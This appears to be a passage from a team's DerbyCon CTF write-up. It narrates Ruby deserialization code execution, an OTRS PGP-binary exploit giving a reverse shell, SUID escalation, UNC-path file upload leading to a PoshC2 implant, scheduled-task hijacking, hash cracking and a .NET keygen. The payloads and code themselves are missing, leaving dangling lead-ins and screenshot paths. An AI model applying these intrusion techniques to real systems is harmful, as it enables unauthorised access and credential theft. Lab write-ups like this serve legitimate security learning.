One of the gems inside this project is called usa. It contains the definition for IdentLDAP and IndentETC, along with a very interesting definition called IdentETCNoPass. Despite a bit of time spent on authenticating with that object, no shell was forthcoming – time for a break.

The break involved learning as much as possible about Ruby, looking at some of the other challenges and watching the Offspring, who were awesome.

Coming back to this and thinking about the clue earlier, it was time to try and mock a Ruby object, serialize it and see what happened. To do this we needed a Ruby environment and for this we used https://repl.it – essentially an online code test environment.

With Ruby serialization, only the name of the object has to match during deserialization; any matching members will be populated with the values passed through. Here we were able to mock the User object completely, then serialize it and encode it in Base64. The payload in both the indentType and identToken here was a string that should execute the ping command:

https://stackoverflow.com/questions/6338908/ruby-difference-between-exec-system-and-x-or-backticks

Here is the serialized and encoded form.

And here are the pings coming back after the sending the cookie in:

So where is the flag? Well, unfortunately we only worked this out with 15 minutes of the CTF to go, so despite gaining code execution the flag eluded us. Ah well, it was still a really cool challenge that we had some epic learning from.

OTRS

Having used the Equihax Chat Server to compromise the domain controller and pivot into the internal network, we were faced with some new machines. This was one of them.

In order to find OTRS, we ran various reconnaissance tools post foothold against the internal network of equihax.com. The first was an ARP scan of the network, as shown below. This identified two additional hosts, 192.168.252.10 & 192.168.252.106:

192.168.252.10 was on the inside of the dd-wrt host, which was later revealed not to be exploitable.

After we compromised both Windows hosts within the internal network, we performed a portscan to find out if any additional ports were open from the domain controller. However, it appeared that all ports were available to both hosts on the network.

It was noted that the more stable host was the DC and as such we deployed a SOCKS proxy server from the domain controller (192.168.252.2). The SOCKS proxy allowed us to build a tunnel through the compromised host and funnel all traffic through to the target environment from our own hosts. This feature allowed us to access a number of resources, including connecting remote desktop (RDP) sessions and internal web sites such as OTRS.

The following screenshot shows the homepage of the OTRS software which was identified using lateral movement techniques from the internal domain controller.

After some additional external reconnaissance, it was identified that this software was used as an aid to helpdesk staff for raising tickets internally. By clicking the link shown below, it moved to a login prompt which was found to have easily guessable credentials of helpdesk/helpdesk.

Once connected to the OTRS software as a standard user, the following ticket information was available.

C:\Users\bturner\AppData\Local\Temp\vmware-bturner\VMwareDnD\24ce608a\FreeRDP^% 192.168.252.2_008.png

After looking inside the tickets, the following hint was given:

“Hey Jim I am still working on getting this helpdesk app setup since management insists we actually have to take care of the darn users now.

I know the password I set was Swordfish but I can’t remember what the administrator account name was. Anyway now that this thing is stood up we might as well use it”

Swordfish was both the password for an administrator level account on this software as well as a flag. We had to identify the default account for this host and found this by doing some research on the Internet. This was root@localhost.

C:\Users\bturner\AppData\Local\Temp\vmware-bturner\VMwareDnD\b3c48de5\Tooltip_006.png

We discovered from conducting research against this software (OTRS 6.0.1) that two publicly disclosed vulnerabilities exist in it. One is abusing the packet manager and uploading a new packet which is vulnerable to code execution, and the other abuses the PGP keys which can also achieve code execution.

Only one of the two appeared to work in this environment (CVE-2017-16921) which affected the PGP keys deployment. More information on these vulnerabilities can be found here:

The essence of the vulnerability was editing the PGP::Bin file and parameters to execute some other binary; in this example we used a simple Python reverse TCP connection.

C:\Users\bturner\AppData\Local\Temp\vmware-bturner\VMwareDnD\673abbfb\FreeRDP^% 192.168.252.2_015.png

C:\Users\bturner\AppData\Local\Temp\vmware-bturner\VMwareDnD\e63b38fb\FreeRDP^% 192.168.252.2_016.png

The payload used was:

Once we had a foothold on the host, we identified it was running as the apache user and privilege escalation was required. The usual escalation techniques were attempted and a SetUID binary that seemed out of place was identified.

Using the foothold, we executed the following commands to extract the hashes:

The -O flag writes the contents of the archive to the screen.  However, this didn’t obtain a flag, or at least not until we were able to crack the root password which we didn’t complete before the end of the CTF. In doing this it did reveal that the user’s password for OTRS was OTRS.

C:\Users\bturner\AppData\Local\Temp\vmware-bturner\VMwareDnD\2ac6263c\Selection_017.png

To obtain a full root shell to access the flag we could have either guessed the location, tar’d the entire root folder, or replaced the /etc/shadow & /etc/passwd file to create a new UID 0 user.  We got root access and used PoshC2 for handling our shells, including on this box, as shown below.

There may have been other flags on this host but we ran out of time to find them.

Web Credit Report Dispute Application

This server hosted a custom credit report dispute application. As a pre-authenticated user we were able to create a dispute, but in order to find more of the functionality, we needed to be able to login.

Clicking on the “Create a report” link, we were taken to the “Problem Report form”. As this page was pre-authentication and there was an authenticated section to the application, we immediately started thinking this might be some kind of stored XSS or SQLi. We spent a bit of time fuzzing, which ultimately showed this not to be the case.

Okay then, let’ try and log in.

After a bit of fuzzing on the login form, it turned out that you could log in using the username:password combination of Admin:. Interesting; it looked like there was some kind of injection vulnerability on the password field. We decided we’d roll with it for the moment and see if it anything more could be done with it later.

Once we were authenticated, we got to the /viewreports.php page shown below. It contained all of the reports that had been created. Thanks to fellow CTFers’ prodigious use of Burp Suite Active Scan, there were quite a few reports listed. It was also difficult to understand when one was created – something we later found a solution to.

Clicking on any of the links here took you to the /viewreport.php page again, this time detailing all the information that the relevant user had submitted.

Locating a report that we had just created was a little on hard side; the actual report created looked like it contained some kind of timestamp. Unfortunately, no ID was returned when you created a report either. The solution is documented a little further down.

The rpt field was found to have a path traversal vulnerability, but by far the most interesting part of the page was the “I have fixed this!” link. Viewing the source of the page and decoding the URL using the Burp shortcut ctrl+shift+u, we could see that the rename.php page took two parameters, old & new, which just happened to take file paths as values.

Our immediate thought was to inject PHP via the create report page, locate it on the view requests page, move it so it had a PHP extension, navigate to it and BOOM code execution.

If only it was that simple; it was indeed possible to change the file extension to PHP, PHP5 and PHPS, however all the fields in the Report Creation page were being escaped on output, exactly as can be seen here with the first name field:

Okay, so how was it possible to easily spot the page that had just been created?

Well, no Spicy Weasel write-up is complete without the use of LinqPad, our favourite C# scratchpad tool (https://linqpad.net). For those interested in beginning .NET development, this is an excellent tool to experiment with.

The idea was to write a script that would retrieve the listing of the viewreport.php page, persist the current entries and then on every subsequent run check for any new pages. To persist between runs, a static class with static container members was created. LinqPad can use a new process per run of the script which would destroy our static container. To ensure that the results were persisted between runs, the following settings were created (performed by right clicking the query and selecting properties).

Who said you can’t parse HTML with a regex? 🙂

Checking out the server header, we could see that somewhat unusually for a PHP application, it was hosted on Windows. This suddenly made the rename.php file a lot more interesting.

What if the page can read and write to UNC paths..?

So yes, it turns out UNC paths could be read. The problem, though, was that IIS was running with no network credentials, and modern SMB is designed to make it as difficult as possible to allow connections by hosts with no credentials.

By deliberately weakening the SMB configuration on a virtual machine, it was possible to successfully have a file read by sending the request in the screenshot above. This allowed the uploading of a PHP file that kicked off a PowerShell Posh C2 (https://github.com/nettitude/PoshC2) one liner, giving us a shell to go searching for the flags.

Once we identified that vulnerability in the application, we hosted a PHP file which executed PowerShell on the remote host using PoshC2.

C:\Users\bturner\AppData\Local\Temp\vmware-bturner\VMwareDnD\a3c6bd82\Selection_002.png

Once we had C2 on this host, we discovered it was running as the IUSR, which is a low level IIS application user. We attempted various standard privilege escalation checks against the host and concluded it was a Server 2016 box with no trivial escalation vulnerabilities other than no patches applied. Eternal Blue (MS17-010) could have been an option but this is normally unstable for Server 2016 and was probably not the intended exploit for this host.

After further enumeration of the host we identified two more flags on the system using the command below:

This yielded:

  • info.php:2:header(‘Flag: TheBruteForceIsStrongInThisOne’);
  • viewreports.php:19:header(‘Flag: InjectionHeaders’);

We also found a file inside the adminscripts folder that had a hint inside suggesting that this was a scheduled task that ran every five minutes. We added an additional line to execute our PowerShell payload:

This allowed us to obtain administrator level privileges on the host with PoshC2, as shown below. We then extracted the hashes of all users and cracked the password for the administrator user, which was a large flag, as well as one from the administrators’ desktop.

C:\Users\bturner\AppData\Local\Temp\vmware-bturner\VMwareDnD\f6b90190\Selection_007.png

It should be noted that all Windows 2016 hosts had Windows Defender enabled, which was blocking malicious PowerShell.

As such we needed to migrate to inject the PoshC2 shellcode, which employs the AMSI bypass released by @mattifestation:

Equihax License Validator (fu3) – Keygen Project

The Equihax licensing server had one objective – download the application and try to reverse engineer the .NET application to create a keygen to submit back to the original site for verification.

We first identified it was a .NET assembly by running the file command on Linux.

We used iLSpy to decompile the binary, but it generated the following error when trying to decompile validateLicense function.

Z:\Desktop\il1.png

We then downloaded the latest version of iLSpy (4.0.0.4319-beta2) which successfully decompiled the code back to C#.

Z:\Desktop\il2.png

The first section of the code took the users first name and MD5 hashed that value. It then took the first eight characters of that substring and used it in the next part of the code. It also had a static string that it used as part of the keygen creation ( Kc5775cK).

By using the algorithm in the above code, we could simply create our own StringBuilder string and spit it out using LINQPad. There was also some unnecessary code below this, but we didn’t need that to generate the license. Here’s the code for this project and the generated license key.

The full source code is as follows.

This yielded the flag.

MUD

There was a downright evil box that hosted a MUD, courtesy of @Evil_Mog. With the exception of a couple of simple flags, we were unable to gain any traction here. This tweet says it all…

Conclusion

This year’s DerbyCon was as fun as ever, and we really enjoyed participating in the CTF competition. Hopefully you can find some value in us sharing portions of the competition with you.

We’re always grateful for the opportunity to practise our craft and we recognise the sheer effort required to put on an event like DerbyCon, including the annual DerbyCon CTF. Once we’ve rested up, we’ll be looking forward to next year!